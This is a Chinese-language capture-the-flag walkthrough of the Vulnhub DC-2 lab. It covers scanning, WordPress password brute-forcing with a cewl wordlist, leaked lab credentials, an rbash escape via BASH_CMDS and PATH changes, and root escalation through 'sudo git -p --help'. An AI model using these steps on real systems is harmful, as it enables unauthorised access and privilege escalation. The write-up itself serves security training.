【Vulnhub】DC-2靶機
Vulnhub DC-2 靶機
資訊蒐集
訪問web端發現訪問不了,可以觀察到相應的URL為域名而不是IP,需要在hosts檔案種新增一條DNS記錄。
host位置:C:\Windows\System32\drivers\etc
格式:192.168.124.151 dc-2
Nmap掃描結果:
root@kali:/# nmap -sV -A -p 1-65535 192.168.124.151 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 23:18 CST Nmap scan report for 192.168.124.151 Host is up (0.00051s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Did not follow redirect to http://dc-2/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 00:0C:29:64:1B:F2 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目錄爆破:
root@kali:/dirsearch/dirsearch-master# ./dirsearch.py -u http://192.168.124.151 -e * _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: | HTTP method: getSuffixes: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6564 | Request count: 6564 Error Log: /dirsearch/dirsearch-master/logs/errors-20-09-01_23-23-07.log Target: http://192.168.124.151 Output File: /dirsearch/dirsearch-master/reports/192.168.124.151/20-09-01_23-23-07 [23:23:07] Starting: [23:23:08] 403 - 303B - /.htaccess-dev [23:23:08] 403 - 305B - /.htaccess-local [23:23:08] 403 - 304B - /.htaccess.bak1 [23:23:08] 403 - 305B - /.htaccess-marco [23:23:08] 403 - 306B - /.htaccess.sample [23:23:08] 403 - 304B - /.htaccess.save [23:23:08] 403 - 304B - /.htaccess.orig [23:23:08] 403 - 303B - /.htaccess.old [23:23:08] 403 - 302B - /.htaccessOLD [23:23:08] 403 - 303B - /.htaccess.txt [23:23:08] 403 - 303B - /.htaccessOLD2 [23:23:08] 403 - 302B - /.htaccessBAK [23:23:08] 403 - 303B - /.htpasswd-old [23:23:08] 403 - 301B - /.httr-oauth [23:23:09] 403 - 294B - /.php [23:23:16] 200 - 52KB - /index.php [23:23:16] 200 - 19KB - /license.txt [23:23:18] 200 - 7KB - /readme.html [23:23:18] 403 - 303B - /server-status [23:23:18] 403 - 304B - /server-status/ [23:23:20] 301 - 321B - /wp-admin -> http://192.168.124.151/wp-admin/ [23:23:20] 301 - 323B - /wp-content -> http://192.168.124.151/wp-content/ [23:23:20] 200 - 0B - /wp-content/ [23:23:20] 200 - 69B - /wp-content/plugins/akismet/akismet.php [23:23:20] 301 - 324B - /wp-includes -> http://192.168.124.151/wp-includes/ [23:23:21] 500 - 0B - /wp-includes/rss-functions.php [23:23:21] 200 - 40KB - /wp-includes/ [23:23:21] 200 - 2KB - /wp-login.php [23:23:21] 500 - 4KB - /wp-admin/setup-config.php [23:23:21] 302 - 0B - /wp-admin/ -> http://dc-2/wp-login.php?redirect_to=http%3A%2F%2F192.168.124.151%2Fwp-admin%2F&reauth=1 [23:23:21] 200 - 1KB - /wp-admin/install.php [23:23:22] 405 - 42B - /xmlrpc.php
存在akismet外掛
includes目錄存在目錄遍歷漏洞
web指紋識別:
為一個wordpress站點
Flag1:
在頁面發現Flag1,提示需要用cewl生成字典然後丟去burpsuite爆破
並且根據上面的目錄爆破確實有一個login的頁面
爆破賬號
cewl生成密碼字典儲存在桌面
cewl -w ./dc.txt http://dc-2
啟動burp進行爆破
爆破出2個賬號
tom parturient
jerry adipiscing
Flag2
但是都無許可權上傳檔案,但是jerry賬號登入後發現flag2
如果從Wordpress找不到拿許可權的地方那就嘗試別的切入點
網上衝浪了一番,發現沒什麼可以好利用的。
於是利用tom賬號試一下之前7744的那個ssh埠
Xshell成功登入!
Flag3
最終在tom賬號登陸後發現flag3
flag3提示需要切換到jerry賬戶
但是發現命令都不可以用,查詢一下報錯資訊
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$ cat
-rbash: cat: command not found
rbash簡介:
rbash(The restricted mode of bash),也就是限制型bash;是平時所謂的 restricted shell的一種,也是最常見的 restricted shell(rbash、ksh、rsh等)
也就是說需要逃逸出當前的rbash環境
https://xz.aliyun.com/t/7642 ---> 先知社群rbash逃逸參考文章
晚上有很多相關文章,但是嘗試後發現都未成功
可以嘗試下面流程
逃脫rbash限制
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
附上參考文章
https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html
https://blog.csdn.net/qq_38677814/article/details/80003851
Flag4
然後發現在home/jerry目錄下有flag4
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
所以還是提權~提示使用git命令提權
這裡不會 只能百度一下
先sudo -l檢視一下使用者許可權
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
發現果然可以 sudo 不用密碼執行git
sudo git -p 提權
執行 sudo git -p --help (終端視窗拉小點)
原理是檢視git的幫助文件可以利用-p分頁,而一旦出現分頁即可用命令列模式
在命令列模式下輸入!/bin/bash 調出root許可權的shell環境
less命令同樣適用此引數
模糊查詢並獲取最終flag
root@DC-2:/# find / -name '*flag*.txt'
/home/tom/flag3.txt
/home/jerry/flag4.txt
/root/final-flag.txt
root@DC-2:/# cat /root/final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.